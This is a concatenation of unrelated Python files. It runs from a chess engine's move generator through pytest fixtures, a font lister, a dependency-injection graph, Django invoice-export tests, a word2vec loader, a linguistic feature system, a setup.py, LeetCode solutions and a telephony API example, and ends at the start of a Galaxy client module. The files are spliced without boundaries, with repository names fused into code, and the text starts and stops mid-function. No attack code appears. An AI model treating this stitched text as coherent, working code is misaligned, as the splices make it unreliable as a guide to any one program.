square) elif lp == 'b': self.add(BISHOP, color, square) self.values[square] = self.piece_value(BISHOP, color, square) elif lp == 'r': self.add(ROOK, color, square) self.values[square] = self.piece_value(ROOK, color, square) elif lp == 'q': self.add(QUEEN, color, square) self.values[square] = self.piece_value(QUEEN, color, square) elif lp == 'k': self.add(KING, color, square) self.values[square] = self.piece_value(KING, color, square) x += 1 if tokens[1] == 'w': self.current_color = WHITE else: self.current_color = BLACK self.hash ^= zobrist_color if tokens[2] != '-': for c in tokens[2]: if c == 'K': self.castling[WHITE] |= KINGSIDE elif c == 'Q': self.castling[WHITE] |= QUEENSIDE elif c == 'k': self.castling[BLACK] |= KINGSIDE elif c == 'q': self.castling[BLACK] |= QUEENSIDE self.hash ^= zobrist_castling[self.castle()] if tokens[3] != '-': self.en_passant_square = chess_notation_to_0x88(tokens[3]) self.hash ^= zobrist_en_passant[self.en_passant_square] self.half_moves = int(tokens[4]) self.moves = int(tokens[5]) def castle(self): return ( (self.castling[WHITE] >> 4 >> 1) | (self.castling[BLACK] >> 2 >> 1) ) def attack_moves(self, square, color): moves = [] current = color first = A8 last = H1 if (current == -1): current = self.current_color if is_square(square): first = square last = square for i in range(first, last + 1): if is_not_square(i): i = i + 7 continue if self.colors[i] != current: continue piece = self.pieces[i] if piece == PAWN: for j in range(2, 4): square = i + PAWN_OFFSETS[current][j] if is_not_square(square): continue if self.colors[square] != current: moves.append(Move(self, current, i, square, CAPTURE)) else: for j in range(0, PIECE_OFFSET_SIZE[piece]): offset = PIECE_OFFSET[piece][j] square = i while True: square += offset if is_not_square(square): break if not self.pieces[square]: moves.append( Move(self, current, i, square, NORMAL)) else: if self.colors[square] == current: break moves.append( Move(self, current, i, square, CAPTURE)) break # Stop after first move for king and knight if (piece == KING or piece == KNIGHT): break return moves def generate_moves(self, legal, square, color): moves = [] current = color first = A8 last = H1 single = 0 if current == COLOR_EMPTY: current = self.current_color other = next_color(current) if is_square(square): first = square last = square single = 1 for i in range(first, last + 1): if is_not_square(i): i = i + 7 continue if self.colors[i] != current: continue piece = self.pieces[i] if piece == PAWN: # 1 step forward square = i + PAWN_OFFSETS[current][0] if not self.pieces[square]: moves.append(Move(self, current, i, square, NORMAL)) # 2 steps forward square = i + PAWN_OFFSETS[current][1] if (rank(i) == SECOND_RANK[current] and not self.pieces[square]): moves.append(Move(self, current, i, square, BIG_PAWN)) # Captures for j in range(2, 4): square = i + PAWN_OFFSETS[current][j] if is_not_square(square): continue if self.pieces[square] and self.colors[square] == other: moves.append(Move(self, current, i, square, CAPTURE)) elif square == self.en_passant_square: moves.append( Move(self, current, i, square, EN_PASSANT)) else: for j in range(0, PIECE_OFFSET_SIZE[piece]): offset = PIECE_OFFSET[piece][j] square = i while True: square += offset if is_not_square(square): break if not self.pieces[square]: moves.append( Move(self, current, i, square, NORMAL)) else: if self.colors[square] == current: break moves.append( Move(self, current, i, square, CAPTURE)) break # Stop after first for king and knight if (piece == KING or piece == KNIGHT): 
break # Castling if ((not single or last == self.kings[current]) and self.kings[current] != EMPTY): if self.castling[current] & KINGSIDE: origin = self.kings[current] dest = origin + E + E if (not self.pieces[origin + E] and not self.pieces[dest] and not self.attacked(origin, other) and not self.attacked(origin + E, other) and not self.attacked(dest, other)): moves.append(Move(self, current, origin, dest, KINGSIDE)) if self.castling[current] & QUEENSIDE: origin = self.kings[current] dest = origin + W + W if (not self.pieces[origin + W] and not self.pieces[origin + W + W] and not self.pieces[origin + W + W + W] and not self.pieces[dest] and not self.attacked(origin, other) and not self.attacked(origin + W, other) and not self.attacked(dest, other)): moves.append(Move(self, current, origin, dest, QUEENSIDE)) if not legal: return moves legal_moves = [] for move in moves: move.do(self) if not self.in_check(current): legal_moves.append(move) #else: # self.display() move.undo(self) return legal_moves def attacked(self, square, color): for i in range(A8, H1 + 1): if is_not_square(i): i = i + 7 continue if self.colors[i] != color: continue piece = self.pieces[i] diff = i - square diff_0x88 = 0x77 + diff if ATTACKS[diff_0x88] & (1 << SHIFTS[piece]): if piece == PAWN: if ((diff > 0 and color == WHITE) or (diff <= 0 and color == BLACK)): return True continue if piece == KING or piece == KNIGHT: return True offset = RAYS[diff_0x88] j = i + offset blocked = False while j != square: if self.pieces[j]: blocked = True break j += offset if not blocked: return True return False def in_check(self, color): if color == COLOR_EMPTY: color = self.current_color if self.kings[color] == EMPTY: return False return self.attacked(self.kings[color], next_color(color)) def _current_king_position(self): return self.kings[self.current_color] def display(self): print(" a b c d e f g h") for irow in range(8): s = "%d" % (8 - irow) for icol in range(8): sq = irow * 16 + icol s += " %c" % PRINT_ARRAY[self.colors[sq]][self.pieces[sq]] print(s) print(" a b c d e f g h\n") def display_values(self): print(" a b c d e f g h ") for irow in range(8): s = "%d " % (8 - irow) for icol in range(8): sq = irow * 16 + icol num = str(self.values[sq]) s += "%s%s" % (num, " " * (7 - len(num))) print(s) print(" a b c d e f g h ") def status(self, possible_moves): if not possible_moves: possible_moves = self.generate_moves(LEGAL, EMPTY, COLOR_EMPTY) in_check = self.in_check(COLOR_EMPTY) if in_check and not possible_moves: return "checkmate" if in_check: return "check" if not possible_moves: return "stalemate" if self.half_moves >= 50: return "fifty move" return 'normal' def get_pieces(self): if self.hash != self.last_hash: pieces_list = [] for i in range(A8, H1 + 1): if is_not_square(i): i = i + 7 continue if (self.pieces[i] == PIECE_EMPTY or self.colors[i] == COLOR_EMPTY): continue pieces_list.append(Piece( name=NAMES[self.pieces[i]], position=p0x88_to_tuple(i), color="white" if self.colors[i] == WHITE else "black", )) self.pieces_list = pieces_list self.last_hash = self.hash return self.pieces_list def get_hash(self): return self.hash def count(self, color, piece): return self.pieces_count[color * 7 + piece] def piece_value(self, piece, color, square): if color == WHITE: mult = 1 else: mult = -1 square = square ^ 0x77 if piece == PIECE_EMPTY: return 0 if piece == PAWN: return mult * (100 + PAWN_TABLE[square]) elif piece == KNIGHT: return mult * (300 + KNIGHT_TABLE[square]) elif piece == BISHOP: return mult * (301 + BISHOP_TABLE[square]) elif 
piece == ROOK: return mult * (500 + ROOK_TABLE[square]) elif piece == QUEEN: return mult * (900 + QUEEN_TABLE[square]) elif piece == KING: if self.is_endgame(): return mult * (20000 + KING_ENDGAME_TABLE[square]) else: return mult * (20000 + KING_EARLYGAME_TABLE[square]) def is_endgame(self): return ( (self.black_value < 21500 and self.white_value < 21500) or (self.black_value < 21000 or self.white_value < 21000) ) def get_pieces_count(self): the_sum = 0 for i in range(14): the_sum += self.pieces_count[i] return the_sum @staticmethod def is_valid_position(position): """ Check if position is inside the board """ return 0 <= position[0] < 8 and 0 <= position[1] < 8 @staticmethod def chess_notation_to_position(chess_notation): """ Convert chess notation (a1) to position (0, 0) """ return ( ord(chess_notation[0]) - 97, int(chess_notation[1]) - 1 ) def move_key(move): return move.score() 1-10 print("Top of the morning to ya")nchaparr/Geospatial-Analysis-with-Python1138_04_01-site-packages.py0 # Locate your Python site-packages directory import sys # Try the last path in the list print sys.path[-1] # Otherwise look at the whole list manually print sys.path from __future__ import annotations import os import time from collections.abc import Callable, Iterable from pathlib import Path from typing import TYPE_CHECKING, cast import pytest from attrs import define, field from environs import Env from hypothesis import HealthCheck, settings from loguru import logger from marshmallow.validate import OneOf if TYPE_CHECKING: from types import ModuleType from flask.testing import FlaskClient from holdmypics import Holdmypics MAX_LOG_SIZE = 3 * (1024**2) PROFILES = { "ci": {"max_examples": 25, "derandomize": True}, "dev": {"max_examples": 15}, } @define(frozen=True) class AppFactory(object): factory: Callable[[ModuleType], Holdmypics] = field(repr=False) config: ModuleType = field(repr=False) def __call__(self) -> Holdmypics: return self.factory(self.config) def configure_logging(): fmt = ( "[{time:YYYY-MM-DD HH:mm:ss.SSS}] {level:<8} " "{name}:{line} - {message}" ) log_file = os.path.join("log", "holdmytests.log") log_kw = { "format": fmt, "level": "DEBUG", "compression": "tar.gz", "retention": 5, "rotation": MAX_LOG_SIZE, } logger.add(log_file, **log_kw) def pytest_configure(config: pytest.Config): env = Env() env.read_env() # configure_logging() deadline = env.timedelta("HYPOTHESIS_DEADLINE", default=None) common_settings = settings( suppress_health_check=(HealthCheck.data_too_large,), deadline=deadline ) for name in PROFILES: settings.register_profile(name, common_settings, **PROFILES[name]) profile = env("HYPOTHESIS_PROFILE", default="ci", validate=[OneOf(PROFILES)]) settings.load_profile(profile) @pytest.fixture(scope="session", name="config") def config_fixture( tmp_path_factory: pytest.TempPathFactory, pytestconfig: pytest.Config ) -> ModuleType: import config as _config image_dir = pytestconfig.getoption("--image-dir", None) # type: ignore if image_dir is not None: image_dir = Path(cast(str, image_dir)).resolve() else: image_dir = tmp_path_factory.mktemp("holdmypics-images") logger.info("Image dir: {0}", image_dir) test_config = { "DEBUG": False, "SAVED_IMAGES_MAX_SIZE": 1024 * 10, "LOG_FILE_NAME": "holdmypics-test", "SAVED_IMAGES_CACHE_DIR": image_dir, } _config.__dict__.update(test_config) for key, value in test_config.items(): assert key in _config.__dict__ _config.__dict__[key] = value _config.__dict__["TESTING"] = True return _config @pytest.fixture(scope="module", name="app_factory") def 
app_factory_fixture(config: ModuleType) -> AppFactory: from holdmypics import create_app return AppFactory(create_app, config) @pytest.fixture() def app(app_factory: AppFactory) -> Holdmypics: return app_factory() @pytest.fixture() def client(app: Holdmypics) -> Iterable[FlaskClient]: with app.test_client() as client: yield client @pytest.fixture() def time_test(request: pytest.FixtureRequest): start = time.perf_counter() yield None func = cast(Callable, request.function) name = func.__name__ logger.debug("Timed {0!r} - Elapsed: {1:.4f}", name, time.perf_counter() - start) alexjago/ppau-graphics #!/usr/bin/env python3 ################################################################################ #### ABOUT: #### #### Get unique fontnames out of the SVGs in the artwork directory. #### #### The names will be placed in a file. ################################################################################ SOURCE_DIR = "Artwork" # default: "Artwork" OUTPUT_FILE = "FONTLIST.json" # default: "FONTLIST.txt" ################################################################################ #### You shouldn't need to ever edit anything below this comment. #### ################################################################################ VERSION = "0.0.1" import subprocess import argparse import re import json # Parse Arguments parser = argparse.ArgumentParser(description="Collate the fonts used.", prog="PPAU-Graphics Font Lister") parser.add_argument('--source_dir', dest='source_dir', action='store', default=SOURCE_DIR, help="The directory containing the source files.") parser.add_argument('--output_file', dest='output_file', action='store', default=OUTPUT_FILE, help="The file listing the fonts.") parser.add_argument('--version', action='version', version='%(prog)s '+VERSION) arguments = parser.parse_args() # Update Flags SOURCE_DIR = arguments.source_dir OUTPUT_FILE = arguments.output_file combo = {} allnames = set([]) pattern = re.compile(r"font-family(:|=)['\"]?([^;>'\"]*)") # Recursively find all SVGs in SOURCE_DIR SVGs = subprocess.run(["find", SOURCE_DIR, "-type", "f", "-name", "*.svg"], stdout=subprocess.PIPE, universal_newlines=True)\ .stdout.strip().split(sep="\n") for s in SVGs: if len(s) == 0: continue results = set([]) with open(s, 'r', encoding="utf-8") as s_file: for line in s_file: match = pattern.search(line) if match: stripped = match.group(2).strip().strip('"').strip("'").strip() if stripped: results.add(stripped) if len(results): combo[s] = results for n in results: allnames.add(n) with open(arguments.output_file, 'w') as fontlist_file: # pretty print keys = sorted(combo.keys()) allfonts = [{'all' : sorted(list(allnames))}] tree = [{i : list(combo[i])} for i in keys] print(json.dumps(allfonts+tree), file=fontlist_file) """ The object graph is the core unit of microcosm-based applications. Object graphs wire together independently defined `components` using a set of factory functions and application configuration. Components are bound to the graph lazily (or via `graph.use()`) and are cached for reuse. 
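A minimal usage sketch (the "hello_world" binding key is hypothetical and
assumes a factory for it has already been registered with the shared registry):

    graph = create_object_graph(name="example", testing=True)
    graph.use("hello_world")  # force the component to be created and cached
    graph.lock()              # afterwards, no new components may be created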
""" from contextlib import contextmanager from typing import Any, Iterable, Tuple from microcosm.caching import create_cache from microcosm.config.api import configure from microcosm.constants import RESERVED from microcosm.errors import CyclicGraphError, LockedGraphError from microcosm.hooks import invoke_resolve_hook from microcosm.loaders import load_from_environ from microcosm.metadata import Metadata from microcosm.profile import NoopProfiler from microcosm.registry import _registry class ObjectGraph: """ An object graph contains all of the instantiated components for a microservice. Because components can reference each other acyclically, this collection of components forms a directed acyclic graph. """ def __init__(self, metadata, config, registry, profiler, cache, loader): self.metadata = metadata self.config = config self._locked = False self._registry = registry self._profiler = profiler self._cache = cache self.loader = loader def use(self, *keys): """ Explicitly initialize a set of components by their binding keys. """ return [ getattr(self, key) for key in keys ] def assign(self, key, value): """ Explicitly assign a graph binding to a value. In general, graph values should only be derived from registered factories and the graph should not be assigned to; however, there can be exceptions including testing and "virtual" bindings, so assign can be used when circumventing setattr. """ self._cache[key] = value return value def lock(self): """ Lock the graph so that new components cannot be created. """ self._locked = True return self def unlock(self): """ Unlock the graph so that new components can created. """ self._locked = False return self def factory_for(self, key): return self._registry.resolve(key) def get(self, key): return self._cache.get(key) def __getattr__(self, key): """ Access a component by its binding key. If the component is not present, it will be lazily created. :raises CyclicGraphError: if the factory function requires a cycle :raises LockedGraphError: if the graph is locked """ try: component = self._cache[key] if component is RESERVED: raise CyclicGraphError(key) return component except KeyError: pass if self._locked: raise LockedGraphError(key) return self._resolve_key(key) def __setattr__(self, key, value): if not key.startswith("_") and key not in ("metadata", "config", "loader"): raise Exception("Cannot setattr on ObjectGraph for key: {}".format(key)) super(ObjectGraph, self).__setattr__(key, value) @contextmanager def _reserve(self, key): """ Reserve a component's binding temporarily. Protects against cycles. """ self.assign(key, RESERVED) try: yield finally: del self._cache[key] def _resolve_key(self, key): """ Attempt to lazily create a component. :raises NotBoundError: if the component does not have a bound factory :raises CyclicGraphError: if the factory function requires a cycle :raises LockedGraphError: if the graph is locked """ with self._reserve(key): factory = self.factory_for(key) with self._profiler(key): component = factory(self) invoke_resolve_hook(component) return self.assign(key, component) def items(self) -> Iterable[Tuple[str, Any]]: """ Iterates over tuples of (key, component) for all bound components. """ yield from self._cache.items() __getitem__ = __getattr__ def create_object_graph(name, debug=False, testing=False, import_name=None, root_path=None, loader=load_from_environ, registry=_registry, profiler=None, cache=None): """ Create a new object graph. 
:param name: the name of the microservice :param debug: is development debugging enabled? :param testing: is unit testing enabled? :param loader: the configuration loader to use :param registry: the registry to use (defaults to the global) """ metadata = Metadata( name=name, debug=debug, testing=testing, import_name=import_name, root_path=root_path, ) defaults = registry.defaults config = configure(defaults, metadata, loader) if profiler is None: profiler = NoopProfiler() if cache is None or isinstance(cache, str): cache = create_cache(cache) return ObjectGraph( metadata=metadata, config=config, registry=registry, profiler=profiler, cache=cache, loader=loader, ) import datetime import json from decimal import Decimal import pytest from django.core import mail from laske_export.enums import LaskeExportLogInvoiceStatus from laske_export.exporter import LaskeExporter from laske_export.management.commands import send_invoices_to_laske from laske_export.models import LaskeExportLog from leasing.enums import ContactType @pytest.fixture(scope="session") def monkeypatch_session(request): """Experimental (https://github.com/pytest-dev/pytest/issues/363).""" from _pytest.monkeypatch import MonkeyPatch mpatch = MonkeyPatch() yield mpatch mpatch.undo() @pytest.fixture def monkeypatch_laske_exporter_send(monkeypatch_session): def laske_exporter_send(self, filename): pass monkeypatch_session.setattr(LaskeExporter, "send", laske_exporter_send) laske_exporter_send_with_error__error_message = "Unexpected error!" @pytest.fixture def monkeypatch_laske_exporter_send_with_error(monkeypatch_session): def laske_exporter_send(self, filename): raise Exception(laske_exporter_send_with_error__error_message) monkeypatch_session.setattr(LaskeExporter, "send", laske_exporter_send) @pytest.fixture def billing_period(): billing_period_start_date = datetime.date(year=2017, month=7, day=1) billing_period_end_date = datetime.date(year=2017, month=12, day=31) return billing_period_start_date, billing_period_end_date @pytest.fixture def lease(lease_factory): lease = lease_factory( type_id=1, municipality_id=1, district_id=5, notice_period_id=1 ) return lease @pytest.fixture def invoice(contact_factory, invoice_factory, lease, billing_period): billing_period_start_date, billing_period_end_date = billing_period contact = contact_factory( name="Company", type=ContactType.BUSINESS, business_id="1234567-8", ) invoice = invoice_factory( lease=lease, total_amount=Decimal("123.45"), billed_amount=Decimal("123.45"), outstanding_amount=Decimal("123.45"), recipient=contact, billing_period_start_date=billing_period_start_date, billing_period_end_date=billing_period_end_date, ) return invoice @pytest.fixture def broken_invoice(contact_factory, invoice_factory, lease, billing_period): billing_period_start_date, billing_period_end_date = billing_period broken_contact = contact_factory( name="Broken Company", type=ContactType.BUSINESS, business_id="1234567-89", # Incorrect business id ) broken_invoice = invoice_factory( lease=lease, total_amount=Decimal("123.45"), billed_amount=Decimal("123.45"), outstanding_amount=Decimal("123.45"), recipient=broken_contact, billing_period_start_date=billing_period_start_date, billing_period_end_date=billing_period_end_date, ) return broken_invoice @pytest.fixture def send_invoices_to_laske_command(): command = send_invoices_to_laske.Command() return command @pytest.fixture def send_invoices_to_laske_command_handle( broken_invoice, invoice, send_invoices_to_laske_command, monkeypatch_laske_exporter_send, ): 
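# The monkeypatch_laske_exporter_send fixture above replaces LaskeExporter.send
# with a no-op, so handle() exercises the full export pipeline here without
# attempting a real transfer.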
command = send_invoices_to_laske_command command.handle() @pytest.fixture def send_invoices_to_laske_command_handle_with_unexpected_error( broken_invoice, invoice, send_invoices_to_laske_command, monkeypatch_laske_exporter_send_with_error, ): command = send_invoices_to_laske_command command.handle() @pytest.fixture def land_use_agreement_invoice( contact_factory, land_use_agreement_invoice_factory, land_use_agreement_test_data ): contact = contact_factory( name="Company", type=ContactType.BUSINESS, business_id="1234567-8", ) invoice = land_use_agreement_invoice_factory( land_use_agreement=land_use_agreement_test_data, total_amount=Decimal("123.45"), recipient=contact, ) return invoice @pytest.mark.django_db def test_invalid_export_invoice( broken_invoice, invoice, land_use_agreement_invoice, monkeypatch_laske_exporter_send ): exporter = LaskeExporter() exporter.export_invoices([broken_invoice, invoice]) exporter.export_land_use_agreement_invoices([land_use_agreement_invoice]) logs = LaskeExportLog.objects.all() assert logs.count() == 2 log = logs[1] assert log.invoices.count() == 2 log_items = log.laskeexportloginvoiceitem_set.all() assert log_items.count() == 2 failed_invoice_logs = log_items.filter(status=LaskeExportLogInvoiceStatus.FAILED) assert failed_invoice_logs.count() == 1 failed_invoice_log = failed_invoice_logs[0] assert failed_invoice_log.status == LaskeExportLogInvoiceStatus.FAILED error_json = json.loads(failed_invoice_log.information) assert "customer_yid" in error_json sent_invoice_logs = log_items.filter(status=LaskeExportLogInvoiceStatus.SENT) assert sent_invoice_logs.count() == 1 @pytest.mark.django_db def test_send_invoices_to_laske_command_handle( broken_invoice, send_invoices_to_laske_command_handle ): broken_invoice.refresh_from_db() assert len(mail.outbox) == 1 export_mail = mail.outbox[0] assert "Failed" in export_mail.body assert ( "#{} ({})".format(broken_invoice.number, broken_invoice.lease.identifier) in export_mail.body ) @pytest.mark.django_db def test_send_invoices_to_laske_command_handle_with_unexpected_error( send_invoices_to_laske_command_handle_with_unexpected_error, ): assert len(mail.outbox) == 1 export_mail = mail.outbox[0] assert "X-Priority" in export_mail.extra_headers assert export_mail.extra_headers["X-Priority"] == "1" # High assert laske_exporter_send_with_error__error_message in export_mail.body #! /usr/bin/env python3 # -*- coding:utf-8 -*- from paths import all_poems_w2v_model_path, emotion_poem_corpus from gensim import models from poems import Poems from segment import Segmenter import os def _gen_word_model(): segment = Segmenter() poems = Poems(emotion_poem_corpus) poems_data = [] for poem in poems: poem_data = [] for sentence in poem: poem_data.extend(segment.segment(sentence)) poems_data.append(poem_data) model = models.Word2Vec(poems_data, size = 512) model.save(all_poems_w2v_model_path) def get_model(mode = 'word', content = 'all'): if mode == 'word' and content == 'all': if not os.path.exists(all_poems_w2v_model_path): _gen_word_model() model = models.Word2Vec.load(all_poems_w2v_model_path) return modeldmengine/features.py1-10 # features.py - sets and bags of morphosyntactic features """Sets and multisets of predefined feature values.""" import collections from itertools import chain, groupby import operator from dmengine.vendor import oset from . import meta from . 
import tools __all__ = ['FeatureSystem', 'FeatureSet', 'FeatureBag'] # TODO: refactor this module class FeatureMeta(type): """Retrieve from last created feature system as default.""" system = None def __call__(self, value=None): # noqa: N804 if value: key = self.system.get_key(value) self = self.system.mapping[key] return super().__call__() class Feature(metaclass=FeatureMeta): """Hideable morphosyntactic feature.""" __slots__ = ('visible',) def __init__(self, visible=True): self.visible = visible def __nonempty__(self): return self.visible def __eq__(self, other): return self.__class__ is other.__class__ def __ne__(self, other): return self.__class__ is not other.__class__ def __hash__(self): return hash(self.__class__) def __repr__(self): hidden = '' if self.visible else 'hidden ' category = ' ' + self.category if self.category else '' return f'<{hidden}{self.value}{category} feature>' def __str__(self): return self.value if self.visible else f'_self.value_' def hide(self): if not self.visible: raise ValueError(f'Unable to hide {self!r}.') self.visible = False class FeatureSetMeta(type): system = None def __call__(self, values, *, sortkey=operator.attrgetter('index')): # noqa: N804 if isinstance(values, self): return values.copy() if isinstance(values, str): values = values.replace(',', ' ').split() keys = map(self.system.get_key, values) features = (f() for f in map(self.system.mapping.__getitem__, keys)) features = sorted(features, key=sortkey) return super().__call__(features) @meta.serializable class FeatureSet(metaclass=FeatureSetMeta): """Ordered set of morphosyntactic features.""" features = oset.oset @staticmethod def _multi_representer(dumper, self): return dumper.represent_sequence('tag:yaml.org,2002:seq', self.values) @classmethod def from_features(cls, features): return super(cls.__class__, cls).__call__(features) @classmethod def from_featuresets(cls, featuresets): features = chain.from_iterable(fs.features for fs in featuresets) return cls.from_features(features) def __init__(self, features): self.features = self.features(features) def copy(self): return self.from_features(f.__class__() for f in self.features) def __repr__(self): values = ' '.join(self.values) return f'{self.__class__.__name__}({values!r})' def __str__(self): return ' '.join(map(str, self.features)) def __nonzero__(self): return bool(self.features) def __len__(self): return len(self.features) def issubset(self, other): return self.features <= other.features def issubset_visible(self, other): return self.features <= other.visible def hascommon(self, other): return not self.features.isdisjoint(other.features) def _clearlazy(self): attrs = self.__dict__ for name in ('values', 'visible', 'values_visible'): if name in attrs: del attrs[name] @meta.lazyproperty def values(self): return [f.value for f in self.features] @meta.lazyproperty def visible(self): return self.features.__class__(f for f in self.features if f.visible) @meta.lazyproperty def values_visible(self): return [f.value for f in self.features if f.visible] @property def by_category(self, *, groupkey=operator.attrgetter('category')): features = sorted(self.features, key=groupkey) mapping = {k: [f.value for f in g] for k, g in groupby(features, groupkey)} return [mapping.get(c, []) for c in self.__class__.system.categories] @property def by_specificity(self, *, groupkey=operator.attrgetter('specificity')): features = sorted(self.features, key=groupkey) mapping = {k: [f.value for f in g] for k, g in groupby(features, groupkey)} return [mapping.get(c, 
[]) for c in self.__class__.system.specificities] def add(self, other): self._clearlazy() self.features |= other.features def remove(self, other, *, discard=False): if not discard and not other.features <= self.features: raise KeyError self._clearlazy() self.features -= other.features def consume(self, other): if not other.features <= self.features: raise KeyError self._clearlazy() for f in other.features & self.features: f.hide() class FeatureBag(FeatureSet): """Ordered bag of morphosyntactic features.""" features = list def issubset(self, other): return all(map(other.features.__contains__, self.features)) def issubset_visible(self, other): return all(map(other.visible.__contains__, self.features)) def hascommon(self, other): return any(map(other.features.__contains__, self.features)) def add(self, other): self._clearlazy() self.features += other.features def remove(self, other, *, discard=False): if not discard and not self.issubset(other): raise KeyError self._clearlazy() if discard: for f in other.features: try: self.features.remove(f) except ValueError: pass else: for f in other.features: self.features.remove(f) def consume(self, other): if not self.issubset(other): raise KeyError self._clearlazy() for f in other.features: for s in self.features: if s == f and s.visible: s.hide() break else: raise ValueError class FeatureSet(FeatureSet): """Ordered set or bag of morphosyntactic features.""" @meta.serializable class FeatureSystem(object): """Collection of defined morphosyntactic features values.""" Feature = Feature FeatureSet = FeatureSet FeatureBag = FeatureBag @staticmethod def _representer(dumper, self): result = [collections.OrderedDict([('value', f.value), ('category', f.category), ('specificity', f.specificity), ('name', f.name)]) for f in self.mapping.values()] return dumper.represent_sequence('tag:yaml.org,2002:seq', result) def __init__(self, features_kwargs=(), *, always_bag=False): class Feature(self.Feature): __slots__ = () system = self self.Feature = Feature self.mapping = collections.OrderedDict() for index, kwargs in enumerate(features_kwargs): f = self.create_feature(index, **kwargs) self.mapping[f.key] = f if not len(self.mapping) == len(features_kwargs): raise ValueError(f'{self!r} no uniqueness.') self.specificities = sorted({f.specificity for f in self.mapping.values()}, reverse=True) self.categories = tools.uniqued(f.category for f in self.mapping.values()) class FeatureSet(self.FeatureSet): system = self class FeatureBag(self.FeatureBag): system = self self.FeatureSet = FeatureSet self.FeatureBag = FeatureBag FeatureMeta.system = FeatureSetMeta.system = self self.always_bag = bool(always_bag) if always_bag: # change the base of already referenced class FeatureSet.__bases__ = (FeatureBag,) FeatureSet.__name__ = 'FeatureBag' def __len__(self): return len(self.mapping) def __iter__(self): return iter(self.mapping.values()) def __getitem__(self, index): return list(self.mapping.values())[index] _tdrop = ' ,;' _trans = (str.maketrans('', '', _tdrop),) @staticmethod def create_value(value, _trans=_trans): if isinstance(value, int): return f'{value:+d}' return str(value).translate(*_trans) @staticmethod def get_key(value): return str(value).lower().lstrip('+') def create_feature(self, index, value, category=None, specificity=0, name=None): value = self.create_value(value) if not value: raise ValueError(f'{self!r} empty value.') name = str(name).title() if name else self.derive_name(value) class Feature(self.Feature): __slots__ = () Feature.__name__ = f'{name}Feature' 
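# Note: each feature value is modelled as its own dynamically created Feature
# subclass; instances compare equal exactly when they share that class (see
# Feature.__eq__ above), so the value lives on the class while visibility is
# per-instance state.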
Feature.name = name Feature.index = int(index) Feature.key = self.get_key(value) Feature.value = value Feature.category = str(category).lower() if category else '' Feature.specificity = int(specificity) return Feature _derive_replaces = [[('+', 'plus'), ('-', 'minus')], [('1', 'first'), ('2', 'second'), ('3', 'third')], [('sg', 'singular'), ('du', 'dual'), ('pl', 'plural')]] @classmethod def derive_name(cls, value): parts = [] for srpl in cls._derive_replaces: for s, r in srpl: if value.startswith(s): value = value[len(s):] parts.append(r) break parts.append(value) return ''.join(p.title() for p in parts) """ Description: Contains all the configuration for the package on pip """ import setuptools def get_content(*filename): """ Gets the content of a file and returns it as a string Args: filename(str): Name of file to pull content from Returns: str: Content from file """ content = "" for current_file in filename: with open(current_file, encoding="utf8") as full_description: content += full_description.read() return content setuptools.setup( name = "otp_emoji", version = "1.3.0", author = "", author_email = "", description = "Used to generate 🙊 one-time pads 🤐 exclusively in emojis.", long_description = get_content("README.md", "CHANGELOG.md"), long_description_content_type = "text/markdown", url = "https://github.com/Descent098/otp_emoji", include_package_data = True, install_requires=["docopt"], py_modules=["otp_emoji"], entry_points = { 'console_scripts': ['otp_emoji = otp_emoji:main'] }, extras_require = { "dev" : [ "pytest", # Used to run the test code in the tests directory "pdoc3"], # Used to generate API documentation }, classifiers = [ "Programming Language :: Python :: 3", "Operating System :: OS Independent", ], ) rakhi2001/ecom7 __________________________________________________________________________________________________ sample 128 ms submission class Solution: def maxDistToClosest(self, seats: List[int]) -> int: right, left = 0, 0 while seats[left]==0: left+=1 idx = len(seats)-1 while seats[idx]==0: idx -= 1 right +=1 max_, zero = 0, 0 for i in seats: if i == 0: zero += 1 if zero > max_: max_ = zero else: zero = 0 return max([left, right, int(max_/2+0.5)]) __________________________________________________________________________________________________ sample 13144 kb submission class Solution: def maxDistToClosest(self, seats: List[int]) -> int: first, last, prev = -1, -1, -1 ans = 0 for i in range(len(seats)): if seats[i] != 1: continue if prev != -1: ans = max(ans, (i - prev) // 2) elif first == -1: first = i if last < i: last = i prev = i return max(ans, max(first, len(seats) - 1 - last)) __________________________________________________________________________________________________ # Example: List Calls call_list = api.list_calls(to = '+19192223333', size = 2) print(list(call_list)) ## [ ## { ## 'activeTime' : '2017-01-26T16:10:23Z', ## 'callbackUrl' : 'http://yoursite.com/calls', ## 'chargeableDuration' : 60, ## 'direction' : 'out', ## 'endTime' : '2017-01-26T16:10:33Z', ## 'events' : 'https://api.catapult.inetwork.com/v1/users/u-abc123/calls/c-abc123/events', ## 'from' : '+17079311113', ## 'id' : 'c-abc123', ## 'recordingEnabled' : False, ## 'recordingFileFormat' : 'wav', ## 'recordings' : 'https://api.../v1/users/u-abc123/calls/c-abc123/recordings', ## 'startTime' : '2017-01-26T16:10:11Z', ## 'state' : 'completed', ## 'to' : '+19192223333', ## 'transcriptionEnabled': False, ## 'transcriptions' : 'https://api.../v1/users/u-abc123/calls/c-abc123/transcriptions' ## 
}, ## { ## 'activeTime' : '2016-12-29T23:50:35Z', ## 'chargeableDuration' : 60, ## 'direction' : 'out', ## 'endTime' : '2016-12-29T23:50:41Z', ## 'events' : 'https://api.catapult.inetwork.com/v1/users/u-abc123/calls/c-xyz987/events', ## 'from' : '+19194443333', ## 'id' : 'c-xyz987', ## 'recordingEnabled' : False, ## 'recordingFileFormat' : 'wav', ## 'recordings' : 'https://api.../v1/users/u-abc123/calls/c-xyz987/recordings', ## 'startTime' : '2016-12-29T23:50:15Z', ## 'state' : 'completed', ## 'to' : '+19192223333', ## 'transcriptionEnabled': False, ## 'transcriptions' : 'https://api.../v1/users/u-abc123/calls/c-xyz987/transcriptions' ## } ## ] thata/galaxy-dist """ lwr_client ========== This module contains logic for interfacing with an external LWR server. """ import mmap import os import re import time import urllib import urllib2 import simplejson class JobInputs(object): """ Abstractions over dynamic inputs created for a given job (namely the command to execute and created configfiles). **Parameters** command_line : str Local command to execute for this job. (To be rewritten.) config_files : str Config files created for this job. (To be rewritten.) >>> import tempfile >>> tf = tempfile.NamedTemporaryFile() >>> def setup_inputs(tf): ... open(tf.name, "w").write("world /path/to/input the rest") ... inputs = JobInputs("hello /path/to/input", [tf.name]) ... return inputs >>> inputs = setup_inputs(tf) >>> inputs.rewrite_paths("/path/to/input", 'C:\\input') >>> inputs.rewritten_command_line 'hello C:\\\\input' >>> inputs.rewritten_config_files[tf.name] 'world C:\\\\input the rest' >>> tf.close() >>> tf = tempfile.NamedTemporaryFile() >>> inputs = setup_inputs(tf) >>> inputs.find_referenced_subfiles('/path/to') ['/path/to/input'] >>> inputs.path_referenced('/path/to') True >>> inputs.path_referenced('/path/to/input') True >>> inputs.path_referenced('/path/to/notinput') False >>> tf.close() """ def 